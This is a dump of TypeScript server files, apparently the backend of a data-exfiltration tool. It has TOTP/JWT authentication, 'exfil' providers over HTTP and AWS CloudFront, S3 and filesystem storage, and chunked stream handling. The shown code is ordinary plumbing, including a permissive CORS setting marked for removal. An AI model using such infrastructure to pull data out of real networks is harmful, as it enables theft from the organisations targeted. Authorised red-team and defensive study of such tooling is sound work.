bodyParser from 'body-parser'; 5 | import { Keys } from '../jwt'; 6 | import { ConfigInstance } from '../config/instance'; 7 | 8 | export const getAuthRoute = () => { 9 | const authRoute = express.Router(); 10 | 11 | interface TotpRequestData { 12 | totp?: string; 13 | } 14 | 15 | const totp = new OTPAuth.TOTP({ 16 | algorithm: 'SHA1', 17 | digits: 6, 18 | period: 30, 19 | secret: ConfigInstance.Inst.general.totp_secret, 20 | }); 21 | 22 | authRoute.use(bodyParser.json()); 23 | 24 | authRoute.get('/api/auth', (req: Request, res: Response) => { 25 | // This route 
gets caught by the JWT middleware so if we get here the user got a valid JWT. 26 | return res.status(200).json({ message: 'Authentication success' }); 27 | }); 28 | 29 | authRoute.post('/api/auth', (req: Request, res: Response) => { 30 | var _totp = req.body as TotpRequestData; 31 | 32 | if ( 33 | !_totp?.totp || 34 | totp.validate({ token: _totp.totp.replace(/\s/g, ''), window: 3 }) == null 35 | ) 36 | return res.status(401).json({ message: 'Invalid TOTP' }); 37 | 38 | var _jwt = jwt.sign({}, Keys.getInstance().privateKey, { 39 | algorithm: 'RS512', 40 | expiresIn: `${ConfigInstance.Inst.general.jwt_expiry}m`, 41 | subject: 'volatile.vault.dweller', 42 | }); 43 | res.status(200).json({ message: 'Authentication success', token: _jwt }); 44 | }); 45 | return authRoute; 46 | }; 47 | -------------------------------------------------------------------------------- /server/src/routes/config.ts: -------------------------------------------------------------------------------- 1 | import express, { Request, Response } from 'express'; 2 | import { ExtensionRepository } from '../extensions/repository'; 3 | 4 | export const getConfigRoute = () => { 5 | const configRoute = express.Router(); 6 | 7 | configRoute.get('/api/config', async (req: Request, res: Response) => { 8 | var storages = {} 9 | for (const storage of ExtensionRepository.getInstance().storages) { 10 | storages[storage.name] = storage.clientConfig; 11 | } 12 | var exfils = {} 13 | for (const exfil of ExtensionRepository.getInstance().exfils) { 14 | exfils[exfil.name] = exfil.clientConfig; 15 | } 16 | return res.status(201).json({ 17 | message: 'Request successful', 18 | storages: storages, 19 | exfils: exfils 20 | }); 21 | }); 22 | return configRoute; 23 | }; 24 | -------------------------------------------------------------------------------- /server/src/routes/index.ts: -------------------------------------------------------------------------------- 1 | import express from 'express'; 2 | import { getAuthRoute } from './auth'; 3 | import { getConfigRoute } from './config'; 4 | 5 | export const getRoutes = () => { 6 | const routes = express.Router(); 7 | routes.use(getAuthRoute()); 8 | routes.use(getConfigRoute()); 9 | return routes; 10 | }; 11 | -------------------------------------------------------------------------------- /server/src/server.ts: -------------------------------------------------------------------------------- 1 | import { ConfigInstance } from './config/instance'; 2 | import { getRoutes } from './routes'; 3 | import express, { Response, NextFunction } from 'express'; 4 | import { jwt } from './jwt'; 5 | import { Request as JWTRequest, UnauthorizedError } from 'express-jwt'; 6 | import bodyParser from 'body-parser'; 7 | import cors from 'cors'; 8 | import nocache from 'nocache'; 9 | import { FileSystemStorageProvider } from './extensions/storage/FileSystem/filesystem'; 10 | import { ExtensionRepository } from './extensions/repository'; 11 | import { BasicHTTPExfilProvider } from './extensions/exfil/BasicHttp/basichttp'; 12 | import { Logger } from './logging'; 13 | import { AwsCloudFrontExfilProvider } from './extensions/exfil/AwsCloudFront/awscloudfront'; 14 | import { AwsS3StorageProvider } from './extensions/storage/AwsS3/awss3'; 15 | 16 | const EXTENSIONS = [ 17 | new BasicHTTPExfilProvider(), 18 | new FileSystemStorageProvider(), 19 | new AwsCloudFrontExfilProvider(), 20 | new AwsS3StorageProvider() 21 | ]; 22 | 23 | const logger = Logger.Instance.defaultLogger; 24 | 25 | logger.info('Starting up...'); 26 | 27 | 
const main = async (): Promise<void> => { 28 | logger.info('Initializing config...'); 29 | await ConfigInstance.init(); 30 | 31 | for (const extension of EXTENSIONS) { 32 | logger.info(`Initializing extension ${extension.name}...`); 33 | await extension.init(ConfigInstance.Inst); 34 | } 35 | 36 | const failed = EXTENSIONS.filter((e) => e.state == 'InitializationError'); 37 | if (failed.length > 0) { 38 | throw new Error( 39 | `The following extension(s) failed to initialize: ${failed 40 | .map((f) => f.name) 41 | .join(', ')}` 42 | ); 43 | } 44 | 45 | if (ExtensionRepository.getInstance().exfils.length == 0) 46 | throw new Error( 47 | 'No exfil provider was initialized: verify that at least one is configured.' 48 | ); 49 | 50 | if (ExtensionRepository.getInstance().storages.length == 0) 51 | throw new Error( 52 | 'No storage provider was initialized: verify that at least one is configured.' 53 | ); 54 | 55 | const app = express(); 56 | 57 | app.disable('x-powered-by'); 58 | 59 | app.use(nocache()); 60 | app.use( 61 | cors({ 62 | origin: (origin, cb) => { 63 | Promise.all( 64 | ExtensionRepository.getInstance().exfils.map((e) => e.hosts) 65 | ).then((all) => cb(null, all.flat())); 66 | }, 67 | methods: ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS'], 68 | allowedHeaders: ['Authorization', 'Content-Type'], 69 | credentials: true, 70 | }) 71 | ); // TODO: Disable in prod! 72 | 73 | app.use(bodyParser.urlencoded({ extended: false })); 74 | 75 | app.use( 76 | '/api', 77 | jwt.unless({ path: [{ url: '/api/auth', method: 'POST' }] }), 78 | ( 79 | err: UnauthorizedError, 80 | req: JWTRequest, 81 | res: Response, 82 | next: NextFunction 83 | ) => { 84 | if (err || !req.auth?.sub) 85 | return res.status(401).json({ message: 'Authentication failure' }); 86 | return next(); 87 | } 88 | ); 89 | 90 | app.use(getRoutes()); 91 | for (const extension of ExtensionRepository.getInstance().exfils) { 92 | logger.info(`Installing routes for ${extension.name}...`); 93 | await extension.installRoutes(app); 94 | } 95 | 96 | app.use((error, req, res, next) => { 97 | return res.status(400).json({ message: error?.message ?? 
'Failure' }); 98 | }); 99 | 100 | app.use(express.static('public')); 101 | 102 | for (const extension of ExtensionRepository.getInstance().exfils) { 103 | await extension.installCron(); 104 | } 105 | for (const extension of ExtensionRepository.getInstance().storages) { 106 | await extension.installCron(); 107 | } 108 | 109 | const PORT = ConfigInstance.Inst.general.port || 3000; 110 | app.listen(PORT, () => { 111 | logger.info(`Application started on port ${PORT}!`); 112 | }); 113 | }; 114 | 115 | main().catch((error) => { 116 | logger.error(error.message); 117 | }); 118 | -------------------------------------------------------------------------------- /server/src/streams.ts: -------------------------------------------------------------------------------- 1 | import { Readable } from 'stream'; 2 | 3 | export async function readFixedChunks( 4 | readable: Readable, 5 | chunkSize: number, 6 | onChunkCb: (chunk: Buffer, idx: number) => Promise<void> 7 | ): Promise<void> { 8 | let buffer = Buffer.alloc(0); 9 | let count = 0; 10 | let processing = false; // Flag to indicate if a chunk is currently being processed 11 | const queue = []; // Queue to hold pending chunks 12 | 13 | const processQueue = async () => { 14 | if (processing) return; // If already processing, return early 15 | processing = true; // Set the processing flag 16 | 17 | while (queue.length > 0) { 18 | const { chunk, index } = queue.shift(); // Dequeue the next chunk 19 | 20 | try { 21 | await onChunkCb(chunk, index); // Process the chunk with the async callback 22 | } catch (error) { 23 | readable.destroy(error); // If the callback fails, destroy the stream 24 | throw error; 25 | } 26 | } 27 | 28 | processing = false; // Reset the processing flag 29 | }; 30 | 31 | return new Promise((resolve, reject) => { 32 | readable.on('data', (data) => { 33 | buffer = Buffer.concat([buffer, data]); 34 | 35 | while (buffer.length >= chunkSize) { 36 | const chunk = buffer.slice(0, chunkSize); // Extract a chunk of the desired size 37 | queue.push({ chunk, index: count++ }); // Enqueue the chunk 38 | buffer = buffer.slice(chunkSize); // Remove the extracted chunk from the buffer 39 | } 40 | processQueue().catch(reject); 41 | }); 42 | 43 | readable.on('end', () => { 44 | if (buffer.length > 0) { 45 | queue.push({ chunk: buffer, index: count++ }); // Enqueue remaining data as the last chunk 46 | } 47 | processQueue().then(resolve).catch(reject); 48 | }); 49 | 50 | readable.on('error', (err) => { 51 | reject(err); 52 | }); 53 | }); 54 | } 55 | -------------------------------------------------------------------------------- /server/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es2016", 4 | "module": "commonjs", 5 | "esModuleInterop": true, 6 | "outDir": "./dist", 7 | "rootDir": "./src", 8 | "baseUrl": "./", 9 | "skipLibCheck": true, 10 | "moduleResolution": "node", 11 | "resolveJsonModule": true 12 | }, 13 | "include": [ 14 | "src" 15 | ] 16 | } --------------------------------------------------------------------------------
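Finally, a hedged usage sketch for `readFixedChunks` from server/src/streams.ts above: it splits an input stream into fixed-size chunks and awaits the callback for each chunk strictly in order. The input data and chunk size below are arbitrary examples.

```typescript
// Hypothetical consumer of readFixedChunks (server/src/streams.ts).
import { Readable } from 'stream';
import { readFixedChunks } from './streams';

async function demo(): Promise<void> {
  // ~4.1 KiB of dummy data; the final chunk will be smaller than chunkSize.
  const input = Readable.from(Buffer.alloc(4 * 1024 + 100, 0x41));

  await readFixedChunks(input, 1024, async (chunk, idx) => {
    console.log(`chunk ${idx}: ${chunk.length} bytes`);
  });
}
```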